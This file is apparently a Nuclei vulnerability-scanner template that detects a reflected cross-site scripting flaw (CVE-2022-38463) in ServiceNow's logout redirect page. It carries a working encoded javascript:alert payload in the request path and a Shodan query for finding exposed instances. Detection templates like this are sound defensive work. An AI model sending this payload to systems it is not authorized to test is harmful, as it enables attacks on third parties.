nuclei-templates/http/cves/2022/CVE-2022-38463.yaml

50 lines
1.6 KiB
YAML

id: CVE-2022-38463
info:
name: ServiceNow - Cross-Site Scripting
author: amanrawat
severity: medium
description: |
ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.
remediation: |
Apply the latest security patches provided by ServiceNow to mitigate this vulnerability.
reference:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793
- https://nvd.nist.gov/vuln/detail/CVE-2022-38463
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38463
cwe-id: CWE-79
epss-score: 0.00141
epss-percentile: 0.49768
cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: servicenow
product: servicenow
shodan-query: http.title:"ServiceNow"
tags: cve,cve2022,servicenow,xss
http:
- method: GET
path:
- "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "top.location.href = 'javascript:alert(document.domain)';"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022026fa8640fec2a03d8973a3ab11d678681986ca36f68fa8c559a74f653774eb700221009740a9d01f07cc29ffd0b839a9df3bebe0a83b75eb2289177d25979d1a743073:922c64590222798bb761d5b6d8e72950